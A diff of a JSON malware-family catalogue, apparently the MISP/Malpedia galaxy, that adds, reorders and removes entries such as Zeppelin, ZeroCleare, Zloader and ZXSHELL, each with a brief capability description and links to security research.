"http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-butler" ], "synonyms": [ "ShadowWalker" @@ -18482,6 +33251,48 @@ "uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8", "value": "Yahoyah" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yakuza_ransomware", + "https://id-ransomware.blogspot.com/2020/03/teslarvng-ransomware.html" + ], + "synonyms": [ + "Teslarvng Ransomware" + ], + "type": [] + }, + "uuid": "0308eff9-1e8c-434e-b551-40f0ceb7dc0e", + "value": "Yakuza Ransomware" + }, + { + "description": "Yarraq is a ransomware that encrypts files by using asymmetric keys and adding '.yarraq' as extension to the end of filenames. At the time of writing the attacker asks for $2000 ransom in order to provide a decryptor, to enable victims to restore their original files back. To communicate with the attacker the email: cyborgyarraq@protonmail.ch is provided.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yarraq", + "https://yomi.yoroi.company/report/5e1d7b06c21640608183de58/5e1d7b09d1cc4993da62f261/overview", + "https://twitter.com/GrujaRS/status/1210541690349662209" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3bba089d-cd27-465c-8c40-2ff9ff0316c6", + "value": "Yarraq Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yatron", + "https://securelist.com/ransomware-two-pieces-of-good-news/93355/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "710a27e6-0f17-4fa7-bcb9-e130fcb1ee7f", + "value": "Yatron" + }, { "description": "", "meta": { @@ -18498,6 +33309,34 @@ "uuid": "81157066-c2f6-4625-8070-c0a793d57e18", "value": "yayih" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yellow_cockatoo", + "https://redcanary.com/blog/yellow-cockatoo/" + ], + "synonyms": [ + "Polazer" + ], + "type": [] + }, + "uuid": "f1d49672-b857-4ad6-887f-f2bf2bc7c641", + "value": "Yellow Cockatoo RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yoddos", + "https://www.bitdefender.com/files/News/CaseStudies/study/271/Bitdefender-Whitepaper-Scranos-2.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8d67586f-3390-474b-a81e-8be90833f25f", + "value": "Yoddos" + }, { "description": "Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n", "meta": { @@ -18518,8 +33357,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty", + "http://blog.ptsecurity.com/2019/11/studying-donot-team.html", "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/", - "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" + "https://www.secureworks.com/research/threat-profiles/zinc-emerson", + "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/", + "https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/" ], "synonyms": [], "type": [] @@ -18527,19 +33369,66 @@ "uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200", "value": "yty" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.z3", + "https://id-ransomware.blogspot.com/2020/08/z3-ransomware.html" + ], + "synonyms": [ + "Z3enc Ransomware" + ], + "type": [] + }, + "uuid": "3eb96cd0-2d00-45a8-a0a4-54663cc70ab9", + "value": "Z3 Ransomware" + }, + { + "description": "Bitdefender describes the primary features of the family as follows: Presence of a rootkit driver that protects itself as well as its other components, presence of man-in-the-browser capabilities that intercepts and decrypts SSL communications, and presence of an adware cleanup routine used to remove potential competition in the adware space. It also communicates with its C&C server, sending environment information such as installed AV and other applications. The malware also takes screenshots and does browser redirects, potentially manipulating the DOM tree. It also creates traffic in hidden windows, likely causing adfraud. The malware is generally very configurable and internally makes use of Lua scripts.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zacinlo", + "https://labs.bitdefender.com/wp-content/uploads/downloads/six-years-and-counting-inside-the-complex-zacinlo-ad-fraud-operation/" + ], + "synonyms": [ + "s5mark" + ], + "type": [] + }, + "uuid": "5041fed8-25a2-4da2-b2ab-db2364cc064f", + "value": "Zacinlo" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", - "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/", - "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware", - "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", + "https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/", + "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/", "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b", + "https://research.checkpoint.com/malware-against-the-c-monoculture/", + "https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og", + "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/", + "https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", + "https://securelist.com/zebrocys-multilanguage-malware-salad/90680/", "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html", "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html", + "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/", + "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/", + "https://meltx0r.github.io/tech/2019/10/24/apt28.html", + "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://securelist.com/a-zebrocy-go-downloader/89419/" ], "synonyms": [ @@ -18555,7 +33444,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy_au3", - "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/" + "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", + "https://www.secureworks.com/research/threat-profiles/iron-twilight" ], "synonyms": [], "type": [] @@ -18575,6 +33465,36 @@ "uuid": "2211eade-4980-4143-acd7-5ecda26d9dfa", "value": "Zedhou" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeoticus", + "https://labs.sentinelone.com/zeoticus-2-0-ransomware-with-no-c2-required/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "92e89ff1-eae9-4d71-9031-80cca544952e", + "value": "Zeoticus" + }, + { + "description": "Zeppelin is a ransomware written in Delphi and sold a as-a-service. The Cylance research team notes that it is a clear evolution of the known VegaLocker, but they assessed it as a new family becaue of additionally developed modules that makes Zeppelin much more configurable than Vegalocker. There are executable variants of type DLL and EXE.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeppelin_ransomware", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team___Zeppelin_Ransomware_Analysis.pdf", + "https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin", + "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", + "https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5587d163-d5ec-43fc-8071-7e7cd1002ba7", + "value": "Zeppelin Ransomware" + }, { "description": "", "meta": { @@ -18582,11 +33502,12 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess", "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html", "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/", - "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/", - "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html", + "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/", + "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html", "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/", + "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/", "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/" ], "synonyms": [ @@ -18599,6 +33520,21 @@ "uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7", "value": "ZeroAccess" }, + { + "description": "ZeroCleare is a destructive malware. It has been developed in order to wipe the master boot record section in order to damage a disk's partitioning. Attackers use the EldoS RawDisk driver to perform the malicious action, which is not a signed driver and would therefore not runnable by default. The attackers managed to install it by using a vulnerable version of VBoxDrv driver, which the DSE accepts and runs. Used to attack middle-east energy and industrial sectors.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.ibm.com/downloads/cas/OAJ4VZNJ" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a7e1429f-55bd-41ac-bf45-70c93465d113", + "value": "ZeroCleare" + }, { "description": "ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.\r\n\r\nIt first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=).\r\nSo far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes generated.\r\n\r\nThe ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).\r\n", "meta": { @@ -18612,6 +33548,19 @@ "uuid": "585f9f75-1239-4561-8815-c5ae033053a1", "value": "ZeroEvil" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerolocker", + "http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b226e6bb-b8bf-4c5d-b0b3-c7c04d12679a", + "value": "ZeroLocker" + }, { "description": "", "meta": { @@ -18630,23 +33579,31 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus", - "https://zeustracker.abuse.ch/monitor.php", - "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", - "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html", - "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", - "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", - "http://eternal-todo.com/blog/new-zeus-binary", + "https://www.s21sec.com/en/zeus-the-missing-link/", + "https://www.secureworks.com/research/threat-profiles/gold-evergreen", "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html", "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite", - "https://nakedsecurity.sophos.com/2010/07/24/sample-run/", - "https://www.mnin.org/write/ZeusMalware.pdf", - "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20", + "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", + "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/", + "http://eternal-todo.com/blog/new-zeus-binary", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html", "http://eternal-todo.com/blog/zeus-spreading-facebook", "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf", - "http://eternal-todo.com/blog/detecting-zeus", "https://www.secureworks.com/research/zeus?threat=zeus", + "https://www.secureworks.com/research/threat-profiles/bronze-woodland", + "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", + "http://eternal-todo.com/blog/detecting-zeus", + "https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf", + "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", + "https://nakedsecurity.sophos.com/2010/07/24/sample-run/", + "https://www.mnin.org/write/ZeusMalware.pdf", + "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf", + "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html", "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html" ], "synonyms": [ @@ -18657,6 +33614,20 @@ "uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a", "value": "Zeus" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_action", + "https://twitter.com/benkow_/status/1136983062699487232", + "https://www.youtube.com/watch?v=EyDiIAt__dI" + ], + "synonyms": [], + "type": [] + }, + "uuid": "95057d7a-b95a-4173-bae7-9256ae002543", + "value": "ZeusAction" + }, { "description": "", "meta": { @@ -18674,7 +33645,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl", - "https://asert.arbornetworks.com/great-dga-sphinx/", + "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/", "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/", "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/" ], @@ -18705,8 +33676,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin", - "https://twitter.com/siri_urz/status/923479126656323584", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877" + "https://twitter.com/siri_urz/status/923479126656323584" ], "synonyms": [], "type": [] @@ -18732,7 +33702,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhmimikatz", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf", + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf" ], "synonyms": [], "type": [] @@ -18740,17 +33711,81 @@ "uuid": "989330e9-52da-4489-888b-686429db3a45", "value": "ZhMimikatz" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zitmo", + "https://securelist.com/zeus-in-the-mobile-facts-and-theories/36424/" + ], + "synonyms": [ + "ZeuS-in-the-Mobile" + ], + "type": [] + }, + "uuid": "6f08bd79-d22a-471c-882b-f68a42eb4a23", + "value": "ZitMo" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ziyangrat", + "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c23aac20-4987-4c15-af63-7043026c5f82", + "value": "ZiyangRAT" + }, { "description": "This family describes the (initially small) loader, which downloads Zeus OpenSSL.\r\n\r\nIn June 2016, a new loader was dubbed DEloader by Fortinet. It has some functions borrowed from Zeus 2.0.8.9 (e.g. the versioning, nrv2b, binstorage-labels), but more importantly, it downloaded a Zeus-like banking trojan (-> Zeus OpenSSL). Furthermore, the loader shared its versioning with the Zeus OpenSSL it downloaded.\r\nThe initial samples from May 2016 were small (17920 bytes). At some point, visualEncrypt/Decrypt was added, e.g. in v1.11.0.0 (September 2016) with size 27648 bytes. In January 2017 with v1.15.0.0, obfuscation was added, which blew the size up to roughly 80k, and the loader became known as Zloader aka Terdot. These changes may be related to the Moskalvzapoe Distribution Network, which started the distribution of it at the same time.\r\n\r\nPlease note that IBM X-Force decided to call win.zloader/win.zeus_openssl \"Zeus Sphinx\", after mentioning it as \"a new version of Zeus Sphinx\" in their initial post in August 2016. Malpedia thus lists the alias \"Zeus XSphinx\" for win.zeus_openssl - the X to refer to IBM X-Force.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader", - "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html", + "https://securityliterate.com/chantays-resume-investigating-a-cv-themed-zloader-malware-campaign/", + "https://twitter.com/ffforward/status/1324281530026524672", + "https://twitter.com/VK_Intel/status/1294320579311435776", + "https://clickallthethings.wordpress.com/2020/09/21/zloader-xlm-update-macro-code-and-behavior-change/", "https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/", - "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", - "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", + "https://info.phishlabs.com/blog/surge-in-zloader-attacks-observed", + "https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/", + "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.bleepingcomputer.com/news/security/banking-malware-spreading-via-covid-19-relief-payment-phishing/", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://johannesbader.ch/blog/the-dga-of-zloader/", "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware", - "https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/" + "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", + "https://clickallthethings.wordpress.com/2020/06/19/zloader-vba-r1c1-references-and-other-tomfoolery/", + "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", + "https://www.comae.com/posts/2020-03-13_yet-another-active-email-campaign-with-malicious-excel-files-identified/", + "https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf", + "https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-again-new-zloader-variant-returns", + "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", + "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", + "https://www.youtube.com/watch?v=QBoj6GB79wM", + "https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/", + "https://blag.nullteilerfrei.de/2020/05/24/zloader-string-obfuscation/", + "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://blog.malwarebytes.com/threat-analysis/2020/11/malsmoke-operators-abandon-exploit-kits-in-favor-of-social-engineering-scheme/", + "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", + "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/", + "https://blog.alyac.co.kr/3322", + "https://blag.nullteilerfrei.de/2020/06/11/api-hashing-in-the-zloader-malware/", + "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/", + "https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", + "https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/", + "https://www.lac.co.jp/lacwatch/people/20201106_002321.html" ], "synonyms": [ "DELoader", @@ -18765,25 +33800,48 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zoxpng", - "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf" - ], - "synonyms": [ - "gresim" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zlob", + "https://blag.nullteilerfrei.de/2020/08/23/programmatically-nop-the-current-selection-in-ghidra/", + "https://en.wikipedia.org/wiki/Zlob_trojan" ], + "synonyms": [], "type": [] }, - "uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7", - "value": "ZoxPNG" + "uuid": "ddccba7e-89f3-4b51-803c-e473ca5623da", + "value": "Zlob" }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zupdater", + "https://app.any.run/tasks/ea024149-8e83-41c0-b0ed-32ec38dea4a6/" + ], + "synonyms": [ + "Zpevdo" + ], + "type": [] + }, + "uuid": "36a54d23-39ea-446c-b690-6a899890773d", + "value": "ZUpdater" + }, + { + "description": "According to FireEye, ZXSHELL is a backdoor that can be downloaded from the internet, particularly Chinese hacker websites. The backdoor can launch port scans, run a keylogger, capture screenshots, set up an HTTP or SOCKS proxy, launch a reverse command shell, cause SYN floods, and transfer/delete/run files. The publicly available version of the tool provides a graphical user interface that malicious actors can use to interact with victim backdoors. Simplified Chinese is the language used for the bundled ZXSHELL documentation.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell", + "https://risky.biz/whatiswinnti/", "https://github.com/smb01/zxshell", + "https://lab52.io/blog/apt27-rootkit-updates/", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", + "https://meltx0r.github.io/tech/2019/09/19/emissary-panda-apt.html", + "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://content.fireeye.com/apt-41/rpt-apt41", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", "https://blogs.cisco.com/security/talos/opening-zxshell", - "https://blogs.rsa.com/cat-phishing/" + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf" ], "synonyms": [ "Sensocode" @@ -18799,71 +33857,14 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon", "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html", - "https://blog.talosintelligence.com/2017/05/modified-zyklon-and-plugins-from-india.html", - "https://asert.arbornetworks.com/wp-content/uploads/2017/05/zyklon_season.pdf" + "https://blog.talosintelligence.com/2017/05/modified-zyklon-and-plugins-from-india.html" ], "synonyms": [], "type": [] }, "uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722", "value": "Zyklon" - }, - { - "description": "A Windows ransomware that will run certain tasks to prepare the target system for the encryption of files. MedusaLocker avoids executable files, probably to avoid rendering the targeted system unusable for paying the ransom. It uses a combination of AES and RSA-2048, and reportedly appends extensions such as .encrypted, .bomber, .boroff, .breakingbad, .locker16, .newlock, .nlocker, and .skynet.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker" - ], - "synonyms": [], - "type": [] - }, - "uuid": "237a1c2e-fb14-583d-ab2c-71f10a52ec06", - "value": "MedusaLocker" - }, - { - "description": "Raccoon is a stealer and collects \"passwords, cookies and autofill from all popular browsers (including FireFox x64), CC data, system information, almost all existing desktop wallets of cryptocurrencies\".", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon", - "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html", - "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf", - "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block" - ], - "synonyms": [ - "Racoon" - ], - "type": [] - }, - "uuid": "10c03b2e-5e53-11ea-ac08-00163cdbc7b4", - "value": "Raccoon" - }, - { - "description": "According to Bleeping Computer, the ransomware is used in targeted attacks against unpatched Citrix servers. It excludes Russian and Chinese targets using the system's Language ID for filtering. It also tries to disable Windows Defender and has a number of UNIX filepath references in its strings. Encryption method is AES using a dynamically generated key, then bundling this key up via RSA.", - "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-targets-citrix-adc-disables-windows-defender/", - "https://news.sophos.com/en-us/2020/05/21/asnarok2/", - "https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-01-26-ragnarok-cfg-vk.notes.raw" - ], - "synonyms": [], - "type": [] - }, - "uuid": "10c03b2f-5e52-01ea-bc08-00153cdbc7b3", - "value": "Ragnarok" - }, - { - "description": "Conti is a new family of ransomware observed in the wild by the Carbon Black Threat Analysis Unit (TAU). Unlike most ransomware, Conti contains unique features that separate it in terms of performance and focus on network-based targets.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.conti", - "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/" - ], - "synonyms": [], - "type": [] - }, - "uuid": "10c03b2e-5f52-01fa-ac08-00253cdbc6b3", - "value": "Conti" } ], - "version": 2564 -} + "version": 8790 +}